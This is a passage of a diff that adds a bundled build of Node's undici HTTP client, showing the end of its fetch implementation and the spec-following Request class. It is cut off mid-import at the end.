1. Set response’s body to a new body whose stream is stream. + response.body = { stream } + + // 2. If response is not a network error and request’s cache mode is + // not "no-store", then update response in httpCache for request. + // TODO + + // 3. If includeCredentials is true and the user agent is not configured + // to block cookies for request (see section 7 of [COOKIES]), then run the + // "set-cookie-string" parsing algorithm (see section 5.2 of [COOKIES]) on + // the value of each header whose name is a byte-case-insensitive match for + // `Set-Cookie` in response’s header list, if any, and request’s current URL. + // TODO + + // 18. If aborted, then: + // TODO + + // 19. Run these steps in parallel: + + // 1. Run these steps, but abort when fetchParams is canceled: + fetchParams.controller.on('terminated', onAborted) + fetchParams.controller.resume = async () => { + // 1. While true + while (true) { + // 1-3. See onData... + + // 4. Set bytes to the result of handling content codings given + // codings and bytes. + let bytes + let isFailure + try { + const { done, value } = await fetchParams.controller.next() + + if (isAborted(fetchParams)) { + break + } + + bytes = done ? undefined : value + } catch (err) { + if (fetchParams.controller.ended && !timingInfo.encodedBodySize) { + // zlib doesn't like empty streams. + bytes = undefined + } else { + bytes = err + + // err may be propagated from the result of calling readablestream.cancel, + // which might not be an error. https://github.com/nodejs/undici/issues/2009 + isFailure = true + } + } + + if (bytes === undefined) { + // 2. Otherwise, if the bytes transmission for response’s message + // body is done normally and stream is readable, then close + // stream, finalize response for fetchParams and response, and + // abort these in-parallel steps. + readableStreamClose(fetchParams.controller.controller) + + finalizeResponse(fetchParams, response) + + return + } + + // 5. Increase timingInfo’s decoded body size by bytes’s length. + timingInfo.decodedBodySize += bytes?.byteLength ?? 0 + + // 6. If bytes is failure, then terminate fetchParams’s controller. + if (isFailure) { + fetchParams.controller.terminate(bytes) + return + } + + // 7. Enqueue a Uint8Array wrapping an ArrayBuffer containing bytes + // into stream. + fetchParams.controller.controller.enqueue(new Uint8Array(bytes)) + + // 8. If stream is errored, then terminate the ongoing fetch. + if (isErrored(stream)) { + fetchParams.controller.terminate() + return + } + + // 9. If stream doesn’t need more data ask the user agent to suspend + // the ongoing fetch. + if (!fetchParams.controller.controller.desiredSize) { + return + } + } + } + + // 2. If aborted, then: + function onAborted (reason) { + // 2. If fetchParams is aborted, then: + if (isAborted(fetchParams)) { + // 1. Set response’s aborted flag. + response.aborted = true + + // 2. If stream is readable, then error stream with the result of + // deserialize a serialized abort reason given fetchParams’s + // controller’s serialized abort reason and an + // implementation-defined realm. + if (isReadable(stream)) { + fetchParams.controller.controller.error( + fetchParams.controller.serializedAbortReason + ) + } + } else { + // 3. Otherwise, if stream is readable, error stream with a TypeError. + if (isReadable(stream)) { + fetchParams.controller.controller.error(new TypeError('terminated', { + cause: isErrorLike(reason) ? reason : undefined + })) + } + } + + // 4. If connection uses HTTP/2, then transmit an RST_STREAM frame. + // 5. Otherwise, the user agent should close connection unless it would be bad for performance to do so. + fetchParams.controller.connection.destroy() + } + + // 20. Return response. + return response + + async function dispatch ({ body }) { + const url = requestCurrentURL(request) + /** @type {import('../..').Agent} */ + const agent = fetchParams.controller.dispatcher + + return new Promise((resolve, reject) => agent.dispatch( + { + path: url.pathname + url.search, + origin: url.origin, + method: request.method, + body: fetchParams.controller.dispatcher.isMockActive ? request.body && (request.body.source || request.body.stream) : body, + headers: request.headersList.entries, + maxRedirections: 0, + upgrade: request.mode === 'websocket' ? 'websocket' : undefined + }, + { + body: null, + abort: null, + + onConnect (abort) { + // TODO (fix): Do we need connection here? + const { connection } = fetchParams.controller + + if (connection.destroyed) { + abort(new DOMException('The operation was aborted.', 'AbortError')) + } else { + fetchParams.controller.on('terminated', abort) + this.abort = connection.abort = abort + } + }, + + onHeaders (status, headersList, resume, statusText) { + if (status < 200) { + return + } + + let codings = [] + let location = '' + + const headers = new Headers() + + // For H2, the headers are a plain JS object + // We distinguish between them and iterate accordingly + if (Array.isArray(headersList)) { + for (let n = 0; n < headersList.length; n += 2) { + const key = headersList[n + 0].toString('latin1') + const val = headersList[n + 1].toString('latin1') + if (key.toLowerCase() === 'content-encoding') { + // https://www.rfc-editor.org/rfc/rfc7231#section-3.1.2.1 + // "All content-coding values are case-insensitive..." + codings = val.toLowerCase().split(',').map((x) => x.trim()) + } else if (key.toLowerCase() === 'location') { + location = val + } + + headers[kHeadersList].append(key, val) + } + } else { + const keys = Object.keys(headersList) + for (const key of keys) { + const val = headersList[key] + if (key.toLowerCase() === 'content-encoding') { + // https://www.rfc-editor.org/rfc/rfc7231#section-3.1.2.1 + // "All content-coding values are case-insensitive..." + codings = val.toLowerCase().split(',').map((x) => x.trim()).reverse() + } else if (key.toLowerCase() === 'location') { + location = val + } + + headers[kHeadersList].append(key, val) + } + } + + this.body = new Readable({ read: resume }) + + const decoders = [] + + const willFollow = request.redirect === 'follow' && + location && + redirectStatusSet.has(status) + + // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Encoding + if (request.method !== 'HEAD' && request.method !== 'CONNECT' && !nullBodyStatus.includes(status) && !willFollow) { + for (const coding of codings) { + // https://www.rfc-editor.org/rfc/rfc9112.html#section-7.2 + if (coding === 'x-gzip' || coding === 'gzip') { + decoders.push(zlib.createGunzip({ + // Be less strict when decoding compressed responses, since sometimes + // servers send slightly invalid responses that are still accepted + // by common browsers. + // Always using Z_SYNC_FLUSH is what cURL does. + flush: zlib.constants.Z_SYNC_FLUSH, + finishFlush: zlib.constants.Z_SYNC_FLUSH + })) + } else if (coding === 'deflate') { + decoders.push(zlib.createInflate()) + } else if (coding === 'br') { + decoders.push(zlib.createBrotliDecompress()) + } else { + decoders.length = 0 + break + } + } + } + + resolve({ + status, + statusText, + headersList: headers[kHeadersList], + body: decoders.length + ? pipeline(this.body, ...decoders, () => { }) + : this.body.on('error', () => {}) + }) + + return true + }, + + onData (chunk) { + if (fetchParams.controller.dump) { + return + } + + // 1. If one or more bytes have been transmitted from response’s + // message body, then: + + // 1. Let bytes be the transmitted bytes. + const bytes = chunk + + // 2. Let codings be the result of extracting header list values + // given `Content-Encoding` and response’s header list. + // See pullAlgorithm. + + // 3. Increase timingInfo’s encoded body size by bytes’s length. + timingInfo.encodedBodySize += bytes.byteLength + + // 4. See pullAlgorithm... + + return this.body.push(bytes) + }, + + onComplete () { + if (this.abort) { + fetchParams.controller.off('terminated', this.abort) + } + + fetchParams.controller.ended = true + + this.body.push(null) + }, + + onError (error) { + if (this.abort) { + fetchParams.controller.off('terminated', this.abort) + } + + this.body?.destroy(error) + + fetchParams.controller.terminate(error) + + reject(error) + }, + + onUpgrade (status, headersList, socket) { + if (status !== 101) { + return + } + + const headers = new Headers() + + for (let n = 0; n < headersList.length; n += 2) { + const key = headersList[n + 0].toString('latin1') + const val = headersList[n + 1].toString('latin1') + + headers[kHeadersList].append(key, val) + } + + resolve({ + status, + statusText: STATUS_CODES[status], + headersList: headers[kHeadersList], + socket + }) + + return true + } + } + )) + } +} + +module.exports = { + fetch, + Fetch, + fetching, + finalizeAndReportTiming +} + + +/***/ }), + +/***/ 8359: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +/* globals AbortController */ + + + +const { extractBody, mixinBody, cloneBody } = __nccwpck_require__(1472) +const { Headers, fill: fillHeaders, HeadersList } = __nccwpck_require__(554) +const { FinalizationRegistry } = __nccwpck_require__(6436)() +const util = __nccwpck_require__(3983) +const { + isValidHTTPToken, + sameOrigin, + normalizeMethod, + makePolicyContainer, + normalizeMethodRecord +} = __nccwpck_require__(2538) +const { + forbiddenMethodsSet, + corsSafeListedMethodsSet, + referrerPolicy, + requestRedirect, + requestMode, + requestCredentials, + requestCache, + requestDuplex +} = __nccwpck_require__(1037) +const { kEnumerableProperty } = util +const { kHeaders, kSignal, kState, kGuard, kRealm } = __nccwpck_require__(5861) +const { webidl } = __nccwpck_require__(1744) +const { getGlobalOrigin } = __nccwpck_require__(1246) +const { URLSerializer } = __nccwpck_require__(685) +const { kHeadersList, kConstruct } = __nccwpck_require__(2785) +const assert = __nccwpck_require__(9491) +const { getMaxListeners, setMaxListeners, getEventListeners, defaultMaxListeners } = __nccwpck_require__(2361) + +let TransformStream = globalThis.TransformStream + +const kAbortController = Symbol('abortController') + +const requestFinalizer = new FinalizationRegistry(({ signal, abort }) => { + signal.removeEventListener('abort', abort) +}) + +// https://fetch.spec.whatwg.org/#request-class +class Request { + // https://fetch.spec.whatwg.org/#dom-request + constructor (input, init = {}) { + if (input === kConstruct) { + return + } + + webidl.argumentLengthCheck(arguments, 1, { header: 'Request constructor' }) + + input = webidl.converters.RequestInfo(input) + init = webidl.converters.RequestInit(init) + + // https://html.spec.whatwg.org/multipage/webappapis.html#environment-settings-object + this[kRealm] = { + settingsObject: { + baseUrl: getGlobalOrigin(), + get origin () { + return this.baseUrl?.origin + }, + policyContainer: makePolicyContainer() + } + } + + // 1. Let request be null. + let request = null + + // 2. Let fallbackMode be null. + let fallbackMode = null + + // 3. Let baseURL be this’s relevant settings object’s API base URL. + const baseUrl = this[kRealm].settingsObject.baseUrl + + // 4. Let signal be null. + let signal = null + + // 5. If input is a string, then: + if (typeof input === 'string') { + // 1. Let parsedURL be the result of parsing input with baseURL. + // 2. If parsedURL is failure, then throw a TypeError. + let parsedURL + try { + parsedURL = new URL(input, baseUrl) + } catch (err) { + throw new TypeError('Failed to parse URL from ' + input, { cause: err }) + } + + // 3. If parsedURL includes credentials, then throw a TypeError. + if (parsedURL.username || parsedURL.password) { + throw new TypeError( + 'Request cannot be constructed from a URL that includes credentials: ' + + input + ) + } + + // 4. Set request to a new request whose URL is parsedURL. + request = makeRequest({ urlList: [parsedURL] }) + + // 5. Set fallbackMode to "cors". + fallbackMode = 'cors' + } else { + // 6. Otherwise: + + // 7. Assert: input is a Request object. + assert(input instanceof Request) + + // 8. Set request to input’s request. + request = input[kState] + + // 9. Set signal to input’s signal. + signal = input[kSignal] + } + + // 7. Let origin be this’s relevant settings object’s origin. + const origin = this[kRealm].settingsObject.origin + + // 8. Let window be "client". + let window = 'client' + + // 9. If request’s window is an environment settings object and its origin + // is same origin with origin, then set window to request’s window. + if ( + request.window?.constructor?.name === 'EnvironmentSettingsObject' && + sameOrigin(request.window, origin) + ) { + window = request.window + } + + // 10. If init["window"] exists and is non-null, then throw a TypeError. + if (init.window != null) { + throw new TypeError(`'window' option '${window}' must be null`) + } + + // 11. If init["window"] exists, then set window to "no-window". + if ('window' in init) { + window = 'no-window' + } + + // 12. Set request to a new request with the following properties: + request = makeRequest({ + // URL request’s URL. + // undici implementation note: this is set as the first item in request's urlList in makeRequest + // method request’s method. + method: request.method, + // header list A copy of request’s header list. + // undici implementation note: headersList is cloned in makeRequest + headersList: request.headersList, + // unsafe-request flag Set. + unsafeRequest: request.unsafeRequest, + // client This’s relevant settings object. + client: this[kRealm].settingsObject, + // window window. + window, + // priority request’s priority. + priority: request.priority, + // origin request’s origin. The propagation of the origin is only significant for navigation requests + // being handled by a service worker. In this scenario a request can have an origin that is different + // from the current client. + origin: request.origin, + // referrer request’s referrer. + referrer: request.referrer, + // referrer policy request’s referrer policy. + referrerPolicy: request.referrerPolicy, + // mode request’s mode. + mode: request.mode, + // credentials mode request’s credentials mode. + credentials: request.credentials, + // cache mode request’s cache mode. + cache: request.cache, + // redirect mode request’s redirect mode. + redirect: request.redirect, + // integrity metadata request’s integrity metadata. + integrity: request.integrity, + // keepalive request’s keepalive. + keepalive: request.keepalive, + // reload-navigation flag request’s reload-navigation flag. + reloadNavigation: request.reloadNavigation, + // history-navigation flag request’s history-navigation flag. + historyNavigation: request.historyNavigation, + // URL list A clone of request’s URL list. + urlList: [...request.urlList] + }) + + const initHasKey = Object.keys(init).length !== 0 + + // 13. If init is not empty, then: + if (initHasKey) { + // 1. If request’s mode is "navigate", then set it to "same-origin". + if (request.mode === 'navigate') { + request.mode = 'same-origin' + } + + // 2. Unset request’s reload-navigation flag. + request.reloadNavigation = false + + // 3. Unset request’s history-navigation flag. + request.historyNavigation = false + + // 4. Set request’s origin to "client". + request.origin = 'client' + + // 5. Set request’s referrer to "client" + request.referrer = 'client' + + // 6. Set request’s referrer policy to the empty string. + request.referrerPolicy = '' + + // 7. Set request’s URL to request’s current URL. + request.url = request.urlList[request.urlList.length - 1] + + // 8. Set request’s URL list to « request’s URL ». + request.urlList = [request.url] + } + + // 14. If init["referrer"] exists, then: + if (init.referrer !== undefined) { + // 1. Let referrer be init["referrer"]. + const referrer = init.referrer + + // 2. If referrer is the empty string, then set request’s referrer to "no-referrer". + if (referrer === '') { + request.referrer = 'no-referrer' + } else { + // 1. Let parsedReferrer be the result of parsing referrer with + // baseURL. + // 2. If parsedReferrer is failure, then throw a TypeError. + let parsedReferrer + try { + parsedReferrer = new URL(referrer, baseUrl) + } catch (err) { + throw new TypeError(`Referrer "${referrer}" is not a valid URL.`, { cause: err }) + } + + // 3. If one of the following is true + // - parsedReferrer’s scheme is "about" and path is the string "client" + // - parsedReferrer’s origin is not same origin with origin + // then set request’s referrer to "client". + if ( + (parsedReferrer.protocol === 'about:' && parsedReferrer.hostname === 'client') || + (origin && !sameOrigin(parsedReferrer, this[kRealm].settingsObject.baseUrl)) + ) { + request.referrer = 'client' + } else { + // 4. Otherwise, set request’s referrer to parsedReferrer. + request.referrer = parsedReferrer + } + } + } + + // 15. If init["referrerPolicy"] exists, then set request’s referrer policy + // to it. + if (init.referrerPolicy !== undefined) { + request.referrerPolicy = init.referrerPolicy + } + + // 16. Let mode be init["mode"] if it exists, and fallbackMode otherwise. + let mode + if (init.mode !== undefined) { + mode = init.mode + } else { + mode = fallbackMode + } + + // 17. If mode is "navigate", then throw a TypeError. + if (mode === 'navigate') { + throw webidl.errors.exception({ + header: 'Request constructor', + message: 'invalid request mode navigate.' + }) + } + + // 18. If mode is non-null, set request’s mode to mode. + if (mode != null) { + request.mode = mode + } + + // 19. If init["credentials"] exists, then set request’s credentials mode + // to it. + if (init.credentials !== undefined) { + request.credentials = init.credentials + } + + // 18. If init["cache"] exists, then set request’s cache mode to it. + if (init.cache !== undefined) { + request.cache = init.cache + } + + // 21. If request’s cache mode is "only-if-cached" and request’s mode is + // not "same-origin", then throw a TypeError. + if (request.cache === 'only-if-cached' && request.mode !== 'same-origin') { + throw new TypeError( + "'only-if-cached' can be set only with 'same-origin' mode" + ) + } + + // 22. If init["redirect"] exists, then set request’s redirect mode to it. + if (init.redirect !== undefined) { + request.redirect = init.redirect + } + + // 23. If init["integrity"] exists, then set request’s integrity metadata to it. + if (init.integrity != null) { + request.integrity = String(init.integrity) + } + + // 24. If init["keepalive"] exists, then set request’s keepalive to it. + if (init.keepalive !== undefined) { + request.keepalive = Boolean(init.keepalive) + } + + // 25. If init["method"] exists, then: + if (init.method !== undefined) { + // 1. Let method be init["method"]. + let method = init.method + + // 2. If method is not a method or method is a forbidden method, then + // throw a TypeError. + if (!isValidHTTPToken(method)) { + throw new TypeError(`'${method}' is not a valid HTTP method.`) + } + + if (forbiddenMethodsSet.has(method.toUpperCase())) { + throw new TypeError(`'${method}' HTTP method is unsupported.`) + } + + // 3. Normalize method. + method = normalizeMethodRecord[method] ?? normalizeMethod(method) + + // 4. Set request’s method to method. + request.method = method + } + + // 26. If init["signal"] exists, then set signal to it. + if (init.signal !== undefined) { + signal = init.signal + } + + // 27. Set this’s request to request. + this[kState] = request + + // 28. Set this’s signal to a new AbortSignal object with this’s relevant + // Realm. + // TODO: could this be simplified with AbortSignal.any + // (https://dom.spec.whatwg.org/#dom-abortsignal-any) + const ac = new AbortController() + this[kSignal] = ac.signal + this[kSignal][kRealm] = this[kRealm] + + // 29. If signal is not null, then make this’s signal follow signal. + if (signal != null) { + if ( + !signal || + typeof signal.aborted !== 'boolean' || + typeof signal.addEventListener !== 'function' + ) { + throw new TypeError( + "Failed to construct 'Request': member signal is not of type AbortSignal." + ) + } + + if (signal.aborted) { + ac.abort(signal.reason) + } else { + // Keep a strong ref to ac while request object + // is alive. This is needed to prevent AbortController + // from being prematurely garbage collected. + // See, https://github.com/nodejs/undici/issues/1926. + this[kAbortController] = ac + + const acRef = new WeakRef(ac) + const abort = function () { + const ac = acRef.deref() + if (ac !== undefined) { + ac.abort(this.reason) + } + } + + // Third-party AbortControllers may not work with these. + // See, https://github.com/nodejs/undici/pull/1910#issuecomment-1464495619. + try { + // If the max amount of listeners is equal to the default, increase it + // This is only available in node >= v19.9.0 + if (typeof getMaxListeners === 'function' && getMaxListeners(signal) === defaultMaxListeners) { + setMaxListeners(100, signal) + } else if (getEventListeners(signal, 'abort').length >= defaultMaxListeners) { + setMaxListeners(100, signal) + } + } catch {} + + util.addAbortListener(signal, abort) + requestFinalizer.register(ac, { signal, abort }) + } + } + + // 30. Set this’s headers to a new Headers object with this’s relevant + // Realm, whose header list is request’s header list and guard is + // "request". + this[kHeaders] = new Headers(kConstruct) + this[kHeaders][kHeadersList] = request.headersList + this[kHeaders][kGuard] = 'request' + this[kHeaders][kRealm] = this[kRealm] + + // 31. If this’s request’s mode is "no-cors", then: + if (mode === 'no-cors') { + // 1. If this’s request’s method is not a CORS-safelisted method, + // then throw a TypeError. + if (!corsSafeListedMethodsSet.has(request.method)) { + throw new TypeError( + `'${request.method} is unsupported in no-cors mode.` + ) + } + + // 2. Set this’s headers’s guard to "request-no-cors". + this[kHeaders][kGuard] = 'request-no-cors' + } + + // 32. If init is not empty, then: + if (initHasKey) { + /** @type {HeadersList} */ + const headersList = this[kHeaders][kHeadersList] + // 1. Let headers be a copy of this’s headers and its associated header + // list. + // 2. If init["headers"] exists, then set headers to init["headers"]. + const headers = init.headers !== undefined ? init.headers : new HeadersList(headersList) + + // 3. Empty this’s headers’s header list. + headersList.clear() + + // 4. If headers is a Headers object, then for each header in its header + // list, append header’s name/header’s value to this’s headers. + if (headers instanceof HeadersList) { + for (const [key, val] of headers) { + headersList.append(key, val) + } + // Note: Copy the `set-cookie` meta-data. + headersList.cookies = headers.cookies + } else { + // 5. Otherwise, fill this’s headers with headers. + fillHeaders(this[kHeaders], headers) + } + } + + // 33. Let inputBody be input’s request’s body if input is a Request + // object; otherwise null. + const inputBody = input instanceof Request ? input[kState].body : null + + // 34. If either init["body"] exists and is non-null or inputBody is + // non-null, and request’s method is `GET` or `HEAD`, then throw a + // TypeError. + if ( + (init.body != null || inputBody != null) && + (request.method === 'GET' || request.method === 'HEAD') + ) { + throw new TypeError('Request with GET/HEAD method cannot have body.') + } + + // 35. Let initBody be null. + let initBody = null + + // 36. If init["body"] exists and is non-null, then: + if (init.body != null) { + // 1. Let Content-Type be null. + // 2. Set initBody and Content-Type to the result of extracting + // init["body"], with keepalive set to request’s keepalive. + const [extractedBody, contentType] = extractBody( + init.body, + request.keepalive + ) + initBody = extractedBody + + // 3, If Content-Type is non-null and this’s headers’s header list does + // not contain `Content-Type`, then append `Content-Type`/Content-Type to + // this’s headers. + if (contentType && !this[kHeaders][kHeadersList].contains('content-type')) { + this[kHeaders].append('content-type', contentType) + } + } + + // 37. Let inputOrInitBody be initBody if it is non-null; otherwise + // inputBody. + const inputOrInitBody = initBody ?? inputBody + + // 38. If inputOrInitBody is non-null and inputOrInitBody’s source is + // null, then: + if (inputOrInitBody != null && inputOrInitBody.source == null) { + // 1. If initBody is non-null and init["duplex"] does not exist, + // then throw a TypeError. + if (initBody != null && init.duplex == null) { + throw new TypeError('RequestInit: duplex option is required when sending a body.') + } + + // 2. If this’s request’s mode is neither "same-origin" nor "cors", + // then throw a TypeError. + if (request.mode !== 'same-origin' && request.mode !== 'cors') { + throw new TypeError( + 'If request is made from ReadableStream, mode should be "same-origin" or "cors"' + ) + } + + // 3. Set this’s request’s use-CORS-preflight flag. + request.useCORSPreflightFlag = true + } + + // 39. Let finalBody be inputOrInitBody. + let finalBody = inputOrInitBody + + // 40. If initBody is null and inputBody is non-null, then: + if (initBody == null && inputBody != null) { + // 1. If input is unusable, then throw a TypeError. + if (util.isDisturbed(inputBody.stream) || inputBody.stream.locked) { + throw new TypeError( + 'Cannot construct a Request with a Request object that has already been used.' + ) + } + + // 2. Set finalBody to the result of creating a proxy for inputBody. + if (!TransformStream) { + TransformStream = (__nccwpck_require__(5356).TransformStream) + } + + // https://streams.spec.whatwg.org/#readablestream-create-a-proxy + const identityTransform = new TransformStream() + inputBody.stream.pipeThrough(identityTransform) + finalBody = { + source: inputBody.source, + length: inputBody.length, + stream: identityTransform.readable + } + } + + // 41. Set this’s request’s body to finalBody. + this[kState].body = finalBody + } + + // Returns request’s HTTP method, which is "GET" by default. + get method () { + webidl.brandCheck(this, Request) + + // The method getter steps are to return this’s request’s method. + return this[kState].method + } + + // Returns the URL of request as a string. + get url () { + webidl.brandCheck(this, Request) + + // The url getter steps are to return this’s request’s URL, serialized. + return URLSerializer(this[kState].url) + } + + // Returns a Headers object consisting of the headers associated with request. + // Note that headers added in the network layer by the user agent will not + // be accounted for in this object, e.g., the "Host" header. + get headers () { + webidl.brandCheck(this, Request) + + // The headers getter steps are to return this’s headers. + return this[kHeaders] + } + + // Returns the kind of resource requested by request, e.g., "document" + // or "script". + get destination () { + webidl.brandCheck(this, Request) + + // The destination getter are to return this’s request’s destination. + return this[kState].destination + } + + // Returns the referrer of request. Its value can be a same-origin URL if + // explicitly set in init, the empty string to indicate no referrer, and + // "about:client" when defaulting to the global’s default. This is used + // during fetching to determine the value of the `Referer` header of the + // request being made. + get referrer () { + webidl.brandCheck(this, Request) + + // 1. If this’s request’s referrer is "no-referrer", then return the + // empty string. + if (this[kState].referrer === 'no-referrer') { + return '' + } + + // 2. If this’s request’s referrer is "client", then return + // "about:client". + if (this[kState].referrer === 'client') { + return 'about:client' + } + + // Return this’s request’s referrer, serialized. + return this[kState].referrer.toString() + } + + // Returns the referrer policy associated with request. + // This is used during fetching to compute the value of the request’s + // referrer. + get referrerPolicy () { + webidl.brandCheck(this, Request) + + // The referrerPolicy getter steps are to return this’s request’s referrer policy. + return this[kState].referrerPolicy + } + + // Returns the mode associated with request, which is a string indicating + // whether the request will use CORS, or will be restricted to same-origin + // URLs. + get mode () { + webidl.brandCheck(this, Request) + + // The mode getter steps are to return this’s request’s mode. + return this[kState].mode + } + + // Returns the credentials mode associated with request, + // which is a string indicating whether credentials will be sent with the + // request always, never, or only when sent to a same-origin URL. + get credentials () { + // The credentials getter steps are to return this’s request’s credentials mode. + return this[kState].credentials + } + + // Returns the cache mode associated with request, + // which is a string indicating how the request will + // interact with the browser’s cache when fetching. + get cache () { + webidl.brandCheck(this, Request) + + // The cache getter steps are to return this’s request’s cache mode. + return this[kState].cache + } + + // Returns the redirect mode associated with request, + // which is a string indicating how redirects for the + // request will be handled during fetching. A request + // will follow redirects by default. + get redirect () { + webidl.brandCheck(this, Request) + + // The redirect getter steps are to return this’s request’s redirect mode. + return this[kState].redirect + } + + // Returns request’s subresource integrity metadata, which is a + // cryptographic hash of the resource being fetched. Its value + // consists of multiple hashes separated by whitespace. [SRI] + get integrity () { + webidl.brandCheck(this, Request) + + // The integrity getter steps are to return this’s request’s integrity + // metadata. + return this[kState].integrity + } + + // Returns a boolean indicating whether or not request can outlive the + // global in which it was created. + get keepalive () { + webidl.brandCheck(this, Request) + + // The keepalive getter steps are to return this’s request’s keepalive. + return this[kState].keepalive + } + + // Returns a boolean indicating whether or not request is for a reload + // navigation. + get isReloadNavigation () { + webidl.brandCheck(this, Request) + + // The isReloadNavigation getter steps are to return true if this’s + // request’s reload-navigation flag is set; otherwise false. + return this[kState].reloadNavigation + } + + // Returns a boolean indicating whether or not request is for a history + // navigation (a.k.a. back-foward navigation). + get isHistoryNavigation () { + webidl.brandCheck(this, Request) + + // The isHistoryNavigation getter steps are to return true if this’s request’s + // history-navigation flag is set; otherwise false. + return this[kState].historyNavigation + } + + // Returns the signal associated with request, which is an AbortSignal + // object indicating whether or not request has been aborted, and its + // abort event handler. + get signal () { + webidl.brandCheck(this, Request) + + // The signal getter steps are to return this’s signal. + return this[kSignal] + } + + get body () { + webidl.brandCheck(this, Request) + + return this[kState].body ? this[kState].body.stream : null + } + + get bodyUsed () { + webidl.brandCheck(this, Request) + + return !!this[kState].body && util.isDisturbed(this[kState].body.stream) + } + + get duplex () { + webidl.brandCheck(this, Request) + + return 'half' + } + + // Returns a clone of request. + clone () { + webidl.brandCheck(this, Request) + + // 1. If this is unusable, then throw a TypeError. + if (this.bodyUsed || this.body?.locked) { + throw new TypeError('unusable') + } + + // 2. Let clonedRequest be the result of cloning this’s request. + const clonedRequest = cloneRequest(this[kState]) + + // 3. Let clonedRequestObject be the result of creating a Request object, + // given clonedRequest, this’s headers’s guard, and this’s relevant Realm. + const clonedRequestObject = new Request(kConstruct) + clonedRequestObject[kState] = clonedRequest + clonedRequestObject[kRealm] = this[kRealm] + clonedRequestObject[kHeaders] = new Headers(kConstruct) + clonedRequestObject[kHeaders][kHeadersList] = clonedRequest.headersList + clonedRequestObject[kHeaders][kGuard] = this[kHeaders][kGuard] + clonedRequestObject[kHeaders][kRealm] = this[kHeaders][kRealm] + + // 4. Make clonedRequestObject’s signal follow this’s signal. + const ac = new AbortController() + if (this.signal.aborted) { + ac.abort(this.signal.reason) + } else { + util.addAbortListener( + this.signal, + () => { + ac.abort(this.signal.reason) + } + ) + } + clonedRequestObject[kSignal] = ac.signal + + // 4. Return clonedRequestObject. + return clonedRequestObject + } +} + +mixinBody(Request) + +function makeRequest (init) { + // https://fetch.spec.whatwg.org/#requests + const request = { + method: 'GET', + localURLsOnly: false, + unsafeRequest: false, + body: null, + client: null, + reservedClient: null, + replacesClientId: '', + window: 'client', + keepalive: false, + serviceWorkers: 'all', + initiator: '', + destination: '', + priority: null, + origin: 'client', + policyContainer: 'client', + referrer: 'client', + referrerPolicy: '', + mode: 'no-cors', + useCORSPreflightFlag: false, + credentials: 'same-origin', + useCredentials: false, + cache: 'default', + redirect: 'follow', + integrity: '', + cryptoGraphicsNonceMetadata: '', + parserMetadata: '', + reloadNavigation: false, + historyNavigation: false, + userActivation: false, + taintedOrigin: false, + redirectCount: 0, + responseTainting: 'basic', + preventNoCacheCacheControlHeaderModification: false, + done: false, + timingAllowFailed: false, + ...init, + headersList: init.headersList + ? new HeadersList(init.headersList) + : new HeadersList() + } + request.url = request.urlList[0] + return request +} + +// https://fetch.spec.whatwg.org/#concept-request-clone +function cloneRequest (request) { + // To clone a request request, run these steps: + + // 1. Let newRequest be a copy of request, except for its body. + const newRequest = makeRequest({ ...request, body: null }) + + // 2. If request’s body is non-null, set newRequest’s body to the + // result of cloning request’s body. + if (request.body != null) { + newRequest.body = cloneBody(request.body) + } + + // 3. Return newRequest. + return newRequest +} + +Object.defineProperties(Request.prototype, { + method: kEnumerableProperty, + url: kEnumerableProperty, + headers: kEnumerableProperty, + redirect: kEnumerableProperty, + clone: kEnumerableProperty, + signal: kEnumerableProperty, + duplex: kEnumerableProperty, + destination: kEnumerableProperty, + body: kEnumerableProperty, + bodyUsed: kEnumerableProperty, + isHistoryNavigation: kEnumerableProperty, + isReloadNavigation: kEnumerableProperty, + keepalive: kEnumerableProperty, + integrity: kEnumerableProperty, + cache: kEnumerableProperty, + credentials: kEnumerableProperty, + attribute: kEnumerableProperty, + referrerPolicy: kEnumerableProperty, + referrer: kEnumerableProperty, + mode: kEnumerableProperty, + [Symbol.toStringTag]: { + value: 'Request', + configurable: true + } +}) + +webidl.converters.Request = webidl.interfaceConverter( + Request +) + +// https://fetch.spec.whatwg.org/#requestinfo +webidl.converters.RequestInfo = function (V) { + if (typeof V === 'string') { + return webidl.converters.USVString(V) + } + + if (V instanceof Request) { + return webidl.converters.Request(V) + } + + return webidl.converters.USVString(V) +} + +webidl.converters.AbortSignal = webidl.interfaceConverter( + AbortSignal +) + +// https://fetch.spec.whatwg.org/#requestinit +webidl.converters.RequestInit = webidl.dictionaryConverter([ + { + key: 'method', + converter: webidl.converters.ByteString + }, + { + key: 'headers', + converter: webidl.converters.HeadersInit + }, + { + key: 'body', + converter: webidl.nullableConverter( + webidl.converters.BodyInit + ) + }, + { + key: 'referrer', + converter: webidl.converters.USVString + }, + { + key: 'referrerPolicy', + converter: webidl.converters.DOMString, + // https://w3c.github.io/webappsec-referrer-policy/#referrer-policy + allowedValues: referrerPolicy + }, + { + key: 'mode', + converter: webidl.converters.DOMString, + // https://fetch.spec.whatwg.org/#concept-request-mode + allowedValues: requestMode + }, + { + key: 'credentials', + converter: webidl.converters.DOMString, + // https://fetch.spec.whatwg.org/#requestcredentials + allowedValues: requestCredentials + }, + { + key: 'cache', + converter: webidl.converters.DOMString, + // https://fetch.spec.whatwg.org/#requestcache + allowedValues: requestCache + }, + { + key: 'redirect', + converter: webidl.converters.DOMString, + // https://fetch.spec.whatwg.org/#requestredirect + allowedValues: requestRedirect + }, + { + key: 'integrity', + converter: webidl.converters.DOMString + }, + { + key: 'keepalive', + converter: webidl.converters.boolean + }, + { + key: 'signal', + converter: webidl.nullableConverter( + (signal) => webidl.converters.AbortSignal( + signal, + { strict: false } + ) + ) + }, + { + key: 'window', + converter: webidl.converters.any + }, + { + key: 'duplex', + converter: webidl.converters.DOMString, + allowedValues: requestDuplex + } +]) + +module.exports = { Request, makeRequest } + + +/***/ }), + +/***/ 7823: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { Headers, HeadersList, fill } = __nccwpck_require__(554) +const { extractBody, cloneBody, mixinBody } = __nccwpck_require__(1472) +const util = __nccwpck_require__(3983) +const { kEnumerableProperty } = util +const { + isValidReasonPhrase, + isCancelled, + isAborted, + isBlobLike, + serializeJavascriptValueToJSONString, + isErrorLike, + isomorphicEncode +} = __nccwpck_require__(2538) +const { + redirectStatusSet, + nullBodyStatus, + DOMException +} = __nccwpck_require__(1037) +const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) +const { webidl } = __nccwpck_require__(1744) +const { FormData } = __nccwpck_require__(2015) +const { getGlobalOrigin } = __nccwpck_require__(1246) +const { 